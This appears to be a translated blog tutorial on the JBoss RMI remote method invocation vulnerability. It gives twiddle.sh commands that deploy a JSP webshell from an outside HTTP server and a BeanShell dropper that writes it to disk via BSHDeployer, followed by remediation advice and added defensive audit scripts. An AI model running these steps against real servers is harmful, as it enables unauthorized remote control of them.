Friday, December 30, 2016

JBoss remote method invocation exploit Xiangjie

This morning, opening my micro-blog, I saw Empty Heart Prodigal's article on the JBoss vulnerability. It looked like it would still be hard for a rookie to follow, so I looked up the material and wrote this article as a record.
There are many ways to deploy web applications on a JBoss server, for example the JMX Console, Remote Method Invocation (RMI), the JMXInvokerServlet, the HttpAdapter, and so on.
This article is mainly about the RMI remote method invocation vulnerability. Several of the other deployment methods, such as the JMX Console, have vulnerabilities too; whether they can be used mainly depends on whether the JBoss server is configured correctly and strictly. There is an earlier article on this site about JMX Console exploitation; if you are interested, search the site for it.
Metasploit has many modules for different JBoss vulnerabilities, including the jboss_vulnscan module (path: auxiliary/scanner/http/jboss_vulnscan). This module scans a JBoss server for vulnerabilities and can detect whether ports 4444, 1098 and 1099 are open. You can of course also use Nmap to batch-scan a network for open 1099, 1098 or 4444 ports. Sample output:
[+] 192.168.0.35:443 /invoker/JMXInvokerServlet does not require authentication (200)
[*] 192.168.0.35:443 Checking services...
[*] 192.168.0.35:443 Naming Service tcp/1098: open
[*] 192.168.0.35:443 Naming Service tcp/1099: open
[*] 192.168.0.35:443 RMI invoker tcp/4444: open
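Scanner output like the above is most useful when it is turned into a remediation list for the owners of the affected hosts. The following script is an added example (my own, not part of the original post or of Metasploit): it parses lines in the jboss_vulnscan format shown above, keeps only open ports and unauthenticated paths, and attaches the fix the post itself recommends (remove the invoker, close the JNDI and RMI ports). The sample text is constructed; the second host and the "closed" line are invented to show that non-findings are ignored.

```python
import re
from collections import defaultdict

# Constructed sample in the jboss_vulnscan output format shown in the post.
# 192.168.0.36 and the "closed" line are invented to exercise the filtering.
SAMPLE_OUTPUT = """\
[+] 192.168.0.35:443 /invoker/JMXInvokerServlet does not require authentication (200)
[*] 192.168.0.35:443 Checking services...
[*] 192.168.0.35:443 Naming Service tcp/1098: open
[*] 192.168.0.35:443 Naming Service tcp/1099: open
[*] 192.168.0.35:443 RMI invoker tcp/4444: open
[*] 192.168.0.36:8080 Checking services...
[*] 192.168.0.36:8080 Naming Service tcp/1099: closed
"""

# "[*] host:port <service> tcp/<port>: <state>"
PORT_RE = re.compile(
    r"^\[\*\] (?P<host>[\d.]+):\d+ (?P<svc>.+?) tcp/(?P<port>\d+): (?P<state>\w+)"
)
# "[+] host:port <path> does not require authentication (...)"
NOAUTH_RE = re.compile(
    r"^\[\+\] (?P<host>[\d.]+):\d+ (?P<path>/\S+) does not require authentication"
)

# Remediation per exposure, following the post's own fix: remove the invoker
# and close the JNDI/RMI ports.
REMEDIATION = {
    "/invoker/JMXInvokerServlet": "remove or authenticate the HTTP invoker (JMXInvokerServlet)",
    "1099": "bind the JNDI Naming service to localhost or firewall tcp/1099",
    "1098": "bind the JNDI RMI port to localhost or firewall tcp/1098",
    "4444": "remove the RMI invoker or firewall tcp/4444",
}


def triage(scan_text):
    """Return {host: [(finding, remediation), ...]} for the exposures in scan output."""
    findings = defaultdict(list)
    for line in scan_text.splitlines():
        m = NOAUTH_RE.match(line)
        if m:
            path = m.group("path")
            findings[m.group("host")].append(
                (f"{path} reachable without authentication",
                 REMEDIATION.get(path, "restrict access to this path"))
            )
            continue
        m = PORT_RE.match(line)
        if m and m.group("state") == "open":
            port = m.group("port")
            findings[m.group("host")].append(
                (f"{m.group('svc')} tcp/{port} exposed",
                 REMEDIATION.get(port, f"firewall tcp/{port}"))
            )
    return dict(findings)


def report(scan_text):
    """One line per finding: host, what was found, what to do about it."""
    lines = []
    for host, items in sorted(triage(scan_text).items()):
        for finding, fix in items:
            lines.append(f"{host}: {finding} -> {fix}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_OUTPUT)))
```

Feed it the saved console output of a scan of your own estate (`python3 triage.py < scan.log` after replacing the sample with `sys.stdin.read()`); every host that appears in the result has at least one of the four exposures this post relies on.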


For an explanation of JNDI, search Baidu.
To interact with the remote target JBoss server you need a local JBoss installation (for example JBoss AS 4.2.3.GA) and its twiddle tool in the bin directory: twiddle.sh on Linux, twiddle.bat on Windows. Its help output is as follows:
$ sh jboss-4.2.3.GA/bin/twiddle.sh -h
A JMX client to 'twiddle' with a remote JBoss server.

usage: twiddle.sh [options] <command> [command_arguments]

options:
    -h, --help                    Show this help message
        --help-commands           Show a list of commands
    -H=<command>                  Show command specific help
    -c=command.properties         Specify the command.properties file to use
    -D<name>[=<value>]            Set a system property
    --                            Stop processing options
    -s, --server=<url>            The JNDI URL of the remote server
    -a, --adapter=<name>          The JNDI name of the RMI adapter to use
    -u, --user=<name>             Specify the username for authentication
    -p, --password=<name>         Specify the password for authentication
    -q, --quiet                   Be somewhat more quiet
Information about the remote target JBoss server can be obtained with the following command:
root@bt:/pentest/web/jboss/jboss-4.2.1.GA/bin# ./twiddle.sh -s 192.168.0.35 get "jboss.system:type=ServerInfo"
HostAddress=192.168.0.35
......
JavaVersion=1.5.0_13
MaxMemory=266600448
To gain higher privileges, we can deploy our webshell to the JBoss server. This needs a war file containing the webshell; MyEclipse can build one as follows:
1. Open a Web project in MyEclipse
2. Put the JSP in the WebRoot directory
3. Export the project as a war file

After the war containing the webshell has been built, twiddle can deploy it to the target JBoss server. The war first has to be placed on a web server; twistd can serve a directory quickly, as follows:
root@bt:/pentest/web/jboss/fns# ls
getshell.war
root@bt:/pentest/web/jboss/fns# twistd -n --path=. --port=80
To deploy the war to the JBoss server, use the following command:
root@bt:/pentest/web/jboss/jboss-4.2.1.GA/bin# ./twiddle.sh -s 192.168.0.35 invoke "jboss.system:service=MainDeployer" deploy http://10.0.1.50/getshell.war
After execution, our webshell is deployed on the JBoss server at the path:
http://192.168.0.35/getshell/customize.jsp
The above is the use of the RMI remote method invocation vulnerability of a JBoss server. The process has a prerequisite, and the most important one is that the JBoss server must be allowed to reach our remote HTTP server; otherwise there is no way to use RMI to deploy the war to the remote JBoss server this way.
However, in many configurations the firewall does not allow the JBoss server to make outbound connections. If that is the case, you can use the BSHDeployer to execute arbitrary BeanShell on the target JBoss server and deploy the webshell that way.
BeanShell is a scripting language that runs on the JRE and supports regular Java syntax; scripts are quick to write and do not need compiling. The JBoss server's BSHDeployer deploys BeanShell scripts, which are executed automatically once deployed. The specific steps are as follows:
1. Using the method described above, create shell.war containing the jspshell;
2. Generate the base64 representation of shell.war with the Linux base64 command, as follows:
root@bt:~# base64 -w 0 shell.war >> shell.war.base64
3. Create the BeanShell script: create a txt document and save the following into it, without any newlines:
import java.io.FileOutputStream; import sun.misc.BASE64Decoder; String val="<base64 representation of shell.war>"; BASE64Decoder decoder = new BASE64Decoder(); byte[] byteval=decoder.decodeBuffer(val); FileOutputStream fs = new FileOutputStream("/temp/shell.war"); fs.write(byteval); fs.close();
The val variable is the Base64 representation of shell.war. If the target JBoss server is Windows, change the directory accordingly, for example to C:\WINDOWS\TEMP\shell.war. Then rename the txt file to a .bsh file:
4. Use the bin/twiddle.sh tool mentioned above to create the local .bsh file on the remote JBoss server with the following command:
$ ./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.deployer:service=BSHDeployer createScriptDeployment "`cat deployer.bsh`" deployer.bsh
After the command completes, the remote JBoss server will have generated shell.war at /temp/shell.war.
5. Then continue with twiddle.sh to deploy shell.war on the JBoss server, with the following command:
$ ./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy "/temp/shell.war"
If the target JBoss server is Windows, the command is as follows:
$ ./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy "file:C:/WINDOWS/TEMP/shell.war"
This deploys shell.war, our jspshell, on the target JBoss server; the rest you know!
The fix for the JBoss remote method invocation vulnerability, quoting Empty Heart Prodigal's article:
Remove the invoker, and then turn off 1099.
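The fix is short, so here is a way to check that it actually took effect on a server. The following audit script is an added example (mine, not from the post or from the JBoss project). It reads a service descriptor laid out like the JBoss AS 4.x `conf/jboss-service.xml` (the attribute names `Port`, `BindAddress`, `RmiPort`, `RmiBindAddress`, `RMIObjectPort` and `ServerAddress`, and the `${jboss.bind.address}` placeholder, are taken from that layout as I recall it; verify against your own file), substitutes the bind address the server was started with, and flags the JNDI and RMI invoker listeners that are bound to a non-loopback address. It also flags deploy-directory entries that provide the paths used in this post: `http-invoker.sar` (JMXInvokerServlet), `jmx-invoker-service.xml` (the RMI adaptor twiddle talks to) and `bsh-deployer.xml` (BSHDeployer). Those file names are assumed JBoss 4.x default-profile names. Both descriptors below are constructed samples.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Constructed descriptor modelled on the JBoss AS 4.x conf/jboss-service.xml layout
# (an assumption, not copied from a real install): JNDI on 1099/1098 and the JRMP
# invoker on 4444, all bound to whatever ${jboss.bind.address} resolves to.
WEAK_DESCRIPTOR = """<server>
  <mbean code="org.jboss.naming.NamingService" name="jboss:service=Naming">
    <attribute name="Port">1099</attribute>
    <attribute name="BindAddress">${jboss.bind.address}</attribute>
    <attribute name="RmiPort">1098</attribute>
    <attribute name="RmiBindAddress">${jboss.bind.address}</attribute>
  </mbean>
  <mbean code="org.jboss.invocation.jrmp.server.JRMPInvoker"
         name="jboss:service=invoker,type=jrmp">
    <attribute name="RMIObjectPort">4444</attribute>
    <attribute name="ServerAddress">${jboss.bind.address}</attribute>
  </mbean>
</server>"""

# Constructed hardened variant: invoker mbean removed, JNDI pinned to loopback.
HARDENED_DESCRIPTOR = """<server>
  <mbean code="org.jboss.naming.NamingService" name="jboss:service=Naming">
    <attribute name="Port">1099</attribute>
    <attribute name="BindAddress">127.0.0.1</attribute>
    <attribute name="RmiPort">1098</attribute>
    <attribute name="RmiBindAddress">127.0.0.1</attribute>
  </mbean>
</server>"""

# Deploy-directory entries that provide the interfaces used in the post.
# File names are assumed JBoss 4.x default-profile names.
RISKY_DEPLOYMENTS = {
    "http-invoker.sar": "HTTP invoker (JMXInvokerServlet) is deployed",
    "jmx-invoker-service.xml": "RMI JMX adaptor (used by twiddle) is deployed",
    "bsh-deployer.xml": "BSHDeployer is deployed (runs arbitrary BeanShell)",
}


def _is_loopback(addr):
    """True for 127.0.0.0/8, ::1 or the literal 'localhost'."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return addr.lower() == "localhost"


def _attrs(mbean, bind_address):
    """Map attribute name -> value with ${jboss.bind.address} substituted."""
    return {
        a.get("name"): (a.text or "").strip().replace("${jboss.bind.address}", bind_address)
        for a in mbean.findall("attribute")
    }


def audit(descriptor_xml, bind_address, deploy_listing):
    """Return a list of findings; an empty list means the post's fix is in place.

    bind_address is the -b / jboss.bind.address value the server was started with.
    deploy_listing is the list of file names in the profile's deploy directory.
    """
    findings = []
    root = ET.fromstring(descriptor_xml)
    for mbean in root.findall("mbean"):
        code = mbean.get("code", "")
        attrs = _attrs(mbean, bind_address)
        if code.endswith("NamingService"):
            for addr_key, port_key in (("BindAddress", "Port"), ("RmiBindAddress", "RmiPort")):
                addr = attrs.get(addr_key, bind_address)
                if not _is_loopback(addr):
                    findings.append(
                        f"JNDI {port_key}={attrs.get(port_key, '?')} bound to {addr}: "
                        "bind to loopback or firewall it"
                    )
        elif code.endswith("JRMPInvoker"):
            addr = attrs.get("ServerAddress", bind_address)
            if not _is_loopback(addr):
                findings.append(
                    f"RMI invoker port {attrs.get('RMIObjectPort', '?')} bound to {addr}: "
                    "remove the invoker or firewall it"
                )
    for name in deploy_listing:
        if name in RISKY_DEPLOYMENTS:
            findings.append(f"{name}: {RISKY_DEPLOYMENTS[name]}; remove it if unused")
    return findings


if __name__ == "__main__":
    deploy_dir = ["http-invoker.sar", "bsh-deployer.xml", "jbossweb.deployer"]
    for f in audit(WEAK_DESCRIPTOR, "0.0.0.0", deploy_dir):
        print("FINDING:", f)
    print("hardened:", audit(HARDENED_DESCRIPTOR, "0.0.0.0", ["jbossweb.deployer"]))
```

The bind address matters because JBoss AS 4.2 binds to 127.0.0.1 unless started with `-b`; a server started with `-b 0.0.0.0` is what turns the descriptor's defaults into the open 1098/1099/4444 listeners the scan output earlier on this page reports. Binding to loopback stops remote twiddle sessions; removing the invoker and BSHDeployer files removes the deployment paths even for callers who do reach the JNDI port.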
